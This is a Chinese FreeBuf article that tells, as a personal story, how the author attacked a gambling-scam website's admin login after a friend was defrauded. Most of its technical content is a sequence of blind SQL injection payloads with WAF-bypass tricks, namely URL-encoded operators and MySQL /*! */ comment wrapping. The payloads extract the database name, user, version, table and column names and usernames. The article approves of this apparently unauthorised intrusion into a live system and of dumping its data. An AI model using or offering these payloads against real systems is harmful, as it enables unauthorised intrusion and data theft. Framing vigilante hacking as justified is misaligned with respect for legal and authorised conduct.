freeBuf
主站

分類

漏洞 工具 極客 Web安全 系統安全 網絡安全 無線安全 設備/客戶端安全 數據安全 安全管理 企業安全 工控安全

特色

頭條 人物志 活動 視頻 觀點 招聘 報告 資訊 區塊鏈安全 標準與合規 容器安全 公開課

官方公眾號企業安全新浪微博

FreeBuf.COM網絡安全行業門戶,每日發布專業的安全資訊、技術剖析。

FreeBuf+小程序

FreeBuf+小程序

性感“注入”,在線“發牌”
2020-11-04 08:40:31

前言

周末的清晨,我在模模糊糊的睡夢中被電話驚醒,發現好多未接視頻,連忙的看了一下手機,發現我高中的大美女找我,難道是我的桃花運要來了?趕緊問問她找我干嘛。

看來是出事了,先問問她怎么回事把,雖然說她的誘惑力很大,但總的知道怎么回事吧

據朋友交代,他們是通過qq聯系的,然后讓他在一個啵菜APP上下注,下的注都是他們讓下哪個就下哪個的,本來他也是抱著試試的心里,可是,前幾天下注都很準,幾乎全中,所以他就加大了本錢,在加本錢的時候就中的不怎么多了,有時候還會賠錢,可是那時候就想著下一把就贏回來了,就忍不住的跟下去,一來二去就把自己身上的所有錢就投進去了,變成了血本無歸。

像這種非法的詐騙人人得而誅之,居然欺負到我身邊的人身上了,為了防止地球被破壞,為了維護世界的和平,高大又帥氣的我只能挺身而出了。

技術實戰

通過和好友的交流,我得到了倆個有用的信息:

  1. qq號:562xxxxxxx

  2. 啵菜APP:某啵菜

我看了一下對方qq,額,,,連空間都沒有開通,一點有用的信息都沒有。

在試試APP,抓包看看:

可以看到網址:xxx.xxx.com,打開之后是這個樣子

先對目標收集一下信息,發現只開了80和443端口,是一個php 5.x的程序,沒有識別出cms系統,等等信息。

不管那么多了,先掃一下看看有沒有漏洞

居然沒有,看看其他的信息,其中掃描目錄的時候發現了網址的后臺:Login.php

好家伙,連驗證碼都沒有,先包爆破一些試試:

不純在弱口令,自己隨便提交試試:提交后url居然多了一個id,試試這個有沒有注入

好吧,研究一下怎么繞過。

常見的繞狗方法

先判斷是否存在注入

1' and 1=1--+ ? ?  # 攔截
1' or 1=1--+ ? ? ? # 攔截
1' && 1--+ ? ? ? ? # 攔截
1' || 1--+ ? ? ? ? # 攔截
使用url對&&和||編碼可以繞過攔截
1' %26%26 True--+ ? ? # 不攔截
1' %26%26 false--+ ? ? # 不攔截
1' %7c%7c True--+ ? ? # 不攔截
1' %7c%7c false--+ ? ? # 不攔截
?
通過下面這倆條語句基本可以判斷出存在漏洞
1' %26%26 True--+
1' %26%26 false--+

除了使用URL編碼外,還可以使用其他的編碼方式進行繞過嘗試,例如Unicode編碼,Base64編碼,Hex編碼,ASCII編碼等,原理與URL編碼類似。

下面來判斷數據庫的長度

1'%26%26 (length(database())=8)--+  # 攔截
'%26%26 (length(/*!database*/())=1)--+ # 不攔截
?
數據庫的名稱一樣可以獲取到
'%26%26 (ascii(substr((/*!database*/()),1,1))>64)--+

當語句中存在database()語句的時候就會攔截,所有要想辦法對database()函數進行處理,在mysql中 /! ..../ 不是注釋,mysql為了保持兼容,它把一些特有的僅在mysql上用的語句放在/!..../中,這樣這些語句如果在其他數據庫中是不會被執行,但在mysql中它會執行??梢試L試使用/! ..../,包含database(),構造成這樣的語句,成功繞過,這里有回顯,這就好弄,成功判斷出數據庫的長度為8

通過上面的方法獲取用戶名的長度為14

'%26%26 (length(/*!USER*/())=14)--+  # 不攔截

還有獲取版本信息:' %26%26 (ascii(@@version)=53)--+

獲取數據庫的表數量,使用正常的語句一樣會被攔截

' %26%26 (0<(select count(table_name) from information_schema.tables where table_schema=DBname))--+ ?  # 攔截

其中count(table_name)這個函數造成了攔截,還用之前的方法,把count函數用/!../包起來,發現會報錯,那把table_name用/!../包起來,就繞過了

' %26%26 (0<(select count(/*!table_name*/) from information_schema.tables where table_schema=DBname))--+

獲取數據庫的表名,這個語句攔截出在select xx from,一般出現select xx from都會被攔截,思路可以想上面的獲取數量一樣,使用一個函數將xx包起來,經過嘗試發現可以繞過的語句

' %26%26 (0< substr(select table_name from information_schema.tables where table_schema='DBname' limit 0,1)) --+  # 攔截
?
' %26%26 (0< ascii((select substr(/*!table_name*/,1,1) from information_schema.tables where table_schema=DBname limit 0,1))) --+ ? # 不攔截

取數據庫的字段,和上面的思路同理

' %26%26 (0< ascii((select substr(/*!column_name*/,2,1) from information_schema.columns where table_schema = DBname %26%26 table_name = users LIMIT 1,1)))--+ ?  # 不攔截

然后獲取數據就沒有什么難的了

' %26%26 (0<ascii(substr((SELECT group_concat(/*!username*/) FROM `DBname`.`users`),1,1))) --+ ?  # 不攔截

居然語句整都整理好了,那就拿burp掃把,現在就查最后一步了,脫褲,如何脫就不說了,想研究的可以自己百度。

這么多數據,哎好多人被騙了,先提交給公安部門把。

最后

成功的約到美女了,在吃飯的時候她問了好多關于網絡詐騙的問題,看來真的是害怕了,為了體現我的高大上,我就給你好好的講一下吧

網絡詐騙中最常見的就是短信詐騙,短信詐騙的內容也是日新月異,有說你中獎的,有說你購物有問題的,又說你有積分兌換的,有說讓你下載軟件的,各式各樣,有些人看到了部分信息是自己的就覺得是自己,其實很多不法分子可以通過一些手段獲取你的信息,還有像你一樣覺得會天上掉餡餅,沒有付出就有回報,這種是很容易被騙的,想要判斷是不是騙局,首先要判斷這種信息是不是官方發的,如果不確定可以打電話詢問,要不簡單的輕信,沒有天上掉餡餅的好事,網絡詐騙很多,需要自己去判斷分析。

本文作者:, 轉載請注明來自FreeBuf.COM

# 菠菜 # sql注入之waf繞過
被以下專輯收錄,發現更多精彩內容
+ 收入我的專輯
評論 按熱度排序

登錄/注冊后在FreeBuf發布內容哦

相關推薦
  • 0 文章數
  • 0 評論數
  • 0 關注者
文章目錄
登錄 / 注冊后在FreeBuf發布內容哦
收入專輯
四月天小说网